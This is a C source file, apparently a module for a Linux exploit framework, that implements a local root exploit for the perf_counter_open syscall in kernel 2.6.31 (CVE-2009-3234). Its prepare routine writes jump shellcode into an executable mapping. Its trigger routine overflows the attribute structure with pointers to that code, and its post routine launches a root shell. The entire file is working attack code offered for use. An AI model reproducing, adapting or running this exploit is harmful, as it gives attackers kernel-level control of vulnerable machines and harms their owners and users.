128 lines
3.0 KiB
C
128 lines
3.0 KiB
C
/* Ingo m0wnar */
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <fcntl.h>
|
|
#include <sched.h>
|
|
#include <sys/mman.h>
|
|
#include <sys/syscall.h>
|
|
#include "exp_framework.h"
|
|
|
|
#undef __NR_perf_counter_open
|
|
#ifdef __x86_64__
|
|
#define __NR_perf_counter_open 298
|
|
//#define OFFSET_OF_IP 0x88
|
|
#define BUF_SIZE 0x100
|
|
#else
|
|
#define __NR_perf_counter_open 336
|
|
//#define OFFSET_OF_IP 0x5c
|
|
#define BUF_SIZE 0x80
|
|
#endif
|
|
|
|
struct perf_counter_attr {
|
|
unsigned int type;
|
|
unsigned int size;
|
|
};
|
|
|
|
struct exploit_state *exp_state;
|
|
|
|
char *desc = "Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)";
|
|
char *cve = "CVE-2009-3234";
|
|
|
|
int get_exploit_state_ptr(struct exploit_state *ptr)
|
|
{
|
|
exp_state = ptr;
|
|
return 0;
|
|
}
|
|
|
|
int requires_null_page = 0;
|
|
|
|
|
|
static char *dirty_code;
|
|
|
|
int prepare(unsigned char *ptr)
|
|
{
|
|
char *mem;
|
|
int fd;
|
|
|
|
fd = open("./suckit_selinux", O_CREAT | O_WRONLY, 0644);
|
|
if (fd < 0) {
|
|
printf("unable to create file\n");
|
|
exit(1);
|
|
}
|
|
|
|
mem = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
|
if (mem == MAP_FAILED) {
|
|
printf("unable to mmap\n");
|
|
unlink("./suckit_selinux");
|
|
exit(1);
|
|
}
|
|
mem[0] = '\xff';
|
|
mem[1] = '\x15';
|
|
*(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 6 : (unsigned int)mem + 12;
|
|
mem[6] = '\xff';
|
|
mem[7] = '\x25';
|
|
*(unsigned int *)&mem[8] = (sizeof(unsigned long) != sizeof(unsigned int)) ? sizeof(unsigned long) : (unsigned int)mem + 16;
|
|
*(unsigned long *)&mem[12] = (unsigned long)exp_state->own_the_kernel;
|
|
*(unsigned long *)&mem[12 + sizeof(unsigned long)] = (unsigned long)exp_state->exit_kernel;
|
|
write(fd, mem, 0x1000);
|
|
close(fd);
|
|
munmap(mem, 0x1000);
|
|
|
|
fd = open("./suckit_selinux", O_RDONLY);
|
|
if (fd < 0) {
|
|
printf("unable to open file for reading\n");
|
|
unlink("./suckit_selinux");
|
|
exit(1);
|
|
}
|
|
dirty_code = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0);
|
|
if (dirty_code == MAP_FAILED) {
|
|
printf("unable to mmap\n");
|
|
exit(1);
|
|
}
|
|
|
|
unlink("./suckit_selinux");
|
|
|
|
return 0;
|
|
}
|
|
|
|
int trigger(void)
|
|
{
|
|
struct perf_counter_attr *ctr;
|
|
int tid;
|
|
int i;
|
|
|
|
ctr = (struct perf_counter_attr *)calloc(1, 0x1000);
|
|
if (ctr == NULL) {
|
|
fprintf(stdout, "out of memory\n");
|
|
exit(1);
|
|
}
|
|
|
|
/* Ingo's 3 line backdoor, reminds me of wait4() */
|
|
//ctr->size = BUF_SIZE;
|
|
//*(unsigned long *)((char *)ctr + OFFSET_OF_IP) = (unsigned long)dirty_code;
|
|
//syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL);
|
|
|
|
/* just in case it gets compiled differently... ;) */
|
|
ctr->size = BUF_SIZE;
|
|
for (i = 0x40; i < BUF_SIZE; i+= sizeof(unsigned long)) {
|
|
if (!(i % (sizeof(unsigned long) * sizeof(unsigned long))))
|
|
continue;
|
|
*(unsigned long *)((char *)ctr + i) = (unsigned long)dirty_code;
|
|
}
|
|
|
|
syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL);
|
|
|
|
/* if we're successful, we won't get to this next line */
|
|
|
|
fprintf(stdout, "System is not vulnerable.\n");
|
|
exit(1);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int post(void)
|
|
{
|
|
return RUN_ROOTSHELL;
|
|
}
|